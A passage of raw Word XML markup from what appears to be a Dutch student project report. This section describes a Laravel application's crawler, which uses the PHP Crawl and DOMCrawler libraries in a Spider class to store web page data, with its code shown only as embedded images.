                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Http2PDF</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="004347F1">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253110272" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="54095629" wp14:editId="60A033AF">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>2452370</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>479425</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1016635" cy="979170"/>
            <wp:effectExtent l="0" t="0" r="0" b="1143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laravel icon.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId111">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1016635" cy="979170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="004347F1">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253121536" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2F47E25B" wp14:editId="7078AD60">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1627505</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1739265</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2603500" cy="342900"/>
                <wp:effectExtent l="0" t="0" r="0" b="12700"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="676" name="Text Box 676"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="260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09151" w14:textId="136B2D3C" w:rsidR="002A05E5" w:rsidRPr="009F6B8F" w:rsidRDefault="002A05E5" w:rsidP="00E416AF">
                            <w:pPr>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
                                <w:sz w:val="28"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="009F6B8F">
                              <w:rPr>
                                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
                                <w:sz w:val="28"/>
                                <w:lang w:val="en-US"/>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7E25B" id="Text Box 676" o:spid="_x0000_s1240" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:128.15pt;margin-top:136.95pt;width:205pt;height:27pt;z-index:2531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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="30A09151" w14:textId="136B2D3C" w:rsidR="002A05E5" w:rsidRPr="009F6B8F" w:rsidRDefault="002A05E5" w:rsidP="00E416AF">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
                          <w:sz w:val="28"/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="009F6B8F">
                        <w:rPr>
                          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
                          <w:sz w:val="28"/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Libraries</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0DB6FC" w14:textId="6995830D" w:rsidR="00CD0EAE" w:rsidRDefault="00CD0EAE" w:rsidP="00163804"/>
    <w:p w14:paraId="48A75D45" w14:textId="5581D532" w:rsidR="00821293" w:rsidRDefault="00821293" w:rsidP="00FD6EA7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57B2061E" w14:textId="77777777" w:rsidR="00821293" w:rsidRPr="00821293" w:rsidRDefault="00821293" w:rsidP="00821293"/>
    <w:p w14:paraId="138EFBAD" w14:textId="741E3415" w:rsidR="004347F1" w:rsidRDefault="004347F1">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C0FF57" w14:textId="7B36FAF8" w:rsidR="00DA3634" w:rsidRDefault="0082411B" w:rsidP="00163804">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253125632" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="30169BBB" wp14:editId="17752A03">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>865505</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>5080</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4318000" cy="342900"/>
                <wp:effectExtent l="0" t="0" r="0" b="12700"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="687" name="Text Box 687"/>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0C6866D" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="00553D99" w:rsidRDefault="002A05E5" w:rsidP="004347F1">
                            <w:pPr>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:b/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00553D99">
                              <w:rPr>
                                <w:b/>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69BBB" id="Text Box 687" o:spid="_x0000_s1241" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:68.15pt;margin-top:.4pt;width:340pt;height:27pt;z-index:2531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" fillcolor="#ffc000 [3207]" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="20C6866D" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="00553D99" w:rsidRDefault="002A05E5" w:rsidP="004347F1">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:b/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00553D99">
                        <w:rPr>
                          <w:b/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Crawler</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="004347F1" w:rsidRPr="00726BA6">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253123584" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5B0CAC9B" wp14:editId="478F1546">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-913765</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-911860</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="685" name="Rectangle 68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4CD19" id="Rectangle 685" o:spid="_x0000_s1026" style="position:absolute;margin-left:-71.95pt;margin-top:-71.75pt;width:25pt;height:1031.7pt;z-index:-2501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wEHZY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" fillcolor="#bb2422" strokecolor="#bb2422" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="733E59F0" w14:textId="0746F0C3" w:rsidR="00677E26" w:rsidRDefault="0082411B" w:rsidP="00C26333">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="779"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253126656" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1D13643B" wp14:editId="08B369CD">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>864235</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>34290</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4318000" cy="574040"/>
                <wp:effectExtent l="0" t="0" r="0" b="10160"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="688" name="Text Box 688"/>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B1FD664" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="004347F1">
                            <w:pPr>
                              <w:contextualSpacing/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>PHP Crawl</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="0F70AF85" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="00C85041" w:rsidRDefault="002A05E5" w:rsidP="004347F1">
                            <w:pPr>
                              <w:contextualSpacing/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>DOM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3643B" id="Text Box 688" o:spid="_x0000_s1242" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:68.05pt;margin-top:2.7pt;width:340pt;height:45.2pt;z-index:2531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" fillcolor="#ffd966 [1943]" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="7B1FD664" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="004347F1">
                      <w:pPr>
                        <w:contextualSpacing/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>PHP Crawl</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="0F70AF85" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="00C85041" w:rsidRDefault="002A05E5" w:rsidP="004347F1">
                      <w:pPr>
                        <w:contextualSpacing/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>DOMCrawler</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00C26333">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DDF9DA" w14:textId="437CBE61" w:rsidR="004347F1" w:rsidRDefault="0082411B" w:rsidP="00C26333">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="779"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253127680" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3C38D41B" wp14:editId="1382CC80">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>862965</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>306070</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4318635" cy="345440"/>
                <wp:effectExtent l="0" t="0" r="0" b="10160"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="689" name="Text Box 689"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="4318635"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B33609" w14:textId="3912D2A1" w:rsidR="002A05E5" w:rsidRPr="00CA5627" w:rsidRDefault="002A05E5" w:rsidP="00CA5627">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D41B" id="Text Box 689" o:spid="_x0000_s1243" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:67.95pt;margin-top:24.1pt;width:340.05pt;height:27.2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" fillcolor="#ffe599 [1303]" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="0CB33609" w14:textId="3912D2A1" w:rsidR="002A05E5" w:rsidRPr="00CA5627" w:rsidRDefault="002A05E5" w:rsidP="00CA5627">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="22"/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="0082411B">
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="22"/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Klasses</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5F750A" w14:textId="63074E85" w:rsidR="004347F1" w:rsidRDefault="004347F1" w:rsidP="00C26333">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="779"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7250A6D7" w14:textId="7ACBD758" w:rsidR="004347F1" w:rsidRDefault="00DE5F14" w:rsidP="00C26333">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="779"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253128704" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="79114E9D" wp14:editId="26ACB086">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>863600</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>36195</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4318635" cy="459740"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="698" name="Text Box 698"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="4318635" cy="4597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65F556" w14:textId="1634C0ED" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00DE5F14">
                            <w:pPr>
                              <w:contextualSpacing/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>Crawl</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="75C80A01" w14:textId="00DA019E" w:rsidR="002A05E5" w:rsidRPr="00DE5F14" w:rsidRDefault="002A05E5" w:rsidP="00DE5F14">
                            <w:pPr>
                              <w:contextualSpacing/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>Sp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4E9D" id="Text Box 698" o:spid="_x0000_s1244" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:68pt;margin-top:2.85pt;width:340.05pt;height:36.2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" fillcolor="#fff2cc [663]" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="6B65F556" w14:textId="1634C0ED" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00DE5F14">
                      <w:pPr>
                        <w:contextualSpacing/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Crawl</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="75C80A01" w14:textId="00DA019E" w:rsidR="002A05E5" w:rsidRPr="00DE5F14" w:rsidRDefault="002A05E5" w:rsidP="00DE5F14">
                      <w:pPr>
                        <w:contextualSpacing/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Spider</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="090A68F2" w14:textId="64EB3300" w:rsidR="004347F1" w:rsidRDefault="004347F1" w:rsidP="00C26333">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="779"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58816B04" w14:textId="1AED3EA9" w:rsidR="004347F1" w:rsidRDefault="005A53AC" w:rsidP="00C26333">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="779"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253129728" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7356FA6E" wp14:editId="259417E7">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>296545</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1255395</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5458460" cy="2783840"/>
            <wp:effectExtent l="25400" t="25400" r="27940" b="35560"/>
            <wp:wrapSquare wrapText="bothSides"/>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start spider.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId112">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5458460" cy="278384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3156352" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="32BD5E67" wp14:editId="561C08B4">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>356235</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>113665</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5461000" cy="800100"/>
                <wp:effectExtent l="0" t="0" r="25400" b="38100"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="705" name="Text Box 705"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5461000"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D5F331F" w14:textId="48B1620E" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                            <w:r>
                              <w:t>De Crawler maakt gebruik van twee Libraries PHP Crawl en DOMCrawler. Beiden zijn gebouwd om Html documenten te crawlen maar, ik gebruik ieder voor een ander taak. De twee code snippets hieronder zijn van de Class Spider. De eerste functie start de crawl proces en de tweede crawlt de informatie van een Html pagina en slaat het op in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D5E67" id="Text Box 705" o:spid="_x0000_s1245" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:28.05pt;margin-top:8.95pt;width:430pt;height:63pt;z-index:2531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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="6D5F331F" w14:textId="48B1620E" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:r>
                        <w:t>De Crawler maakt gebruik van twee Libraries PHP Crawl en DOMCrawler. Beiden zijn gebouwd om Html documenten te crawlen maar, ik gebruik ieder voor een ander taak. De twee code snippets hieronder zijn van de Class Spider. De eerste functie start de crawl proces en de tweede crawlt de informatie van een Html pagina en slaat het op in de database.</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="007B04C5">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDBC420" w14:textId="10397ECE" w:rsidR="0039450B" w:rsidRDefault="00F03C4F" w:rsidP="00C26333">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="779"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253229056" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="08C259E4" wp14:editId="3E7AF34A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>292735</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2857500</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1206500" cy="228600"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="826" name="Text Box 826"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1206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A096C" w14:textId="2B6B4B81" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                            <w:r>
                              <w:t>Figuur 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259E4" id="Text Box 826" o:spid="_x0000_s1246" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:23.05pt;margin-top:225pt;width:95pt;height:18pt;z-index:2532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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="262A096C" w14:textId="2B6B4B81" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:r>
                        <w:t>Figuur 5.20</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="007B04C5">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="52748640" w14:textId="1885AE4B" w:rsidR="007A28D2" w:rsidRDefault="00530C47" w:rsidP="00C26333">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="779"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253130752" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="378917C4" wp14:editId="0F9D0012">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>297815</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>266065</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5461000" cy="2134235"/>
            <wp:effectExtent l="25400" t="25400" r="25400" b="24765"/>
            <wp:wrapSquare wrapText="bothSides"/>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spider crawl.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId113">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5461000" cy="213423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B4F333E" w14:textId="7E778D80" w:rsidR="007A28D2" w:rsidRDefault="00F03C4F">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253230080" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4B7C612F" wp14:editId="31E41182">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>233680</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2168525</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1143000" cy="228600"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="827" name="Text Box 827"/>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CA0A0" w14:textId="2813259A" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                            <w:r>
                              <w:t>Figuur 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C612F" id="Text Box 827" o:spid="_x0000_s1247" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:18.4pt;margin-top:170.75pt;width:90pt;height:18pt;z-index:2532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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
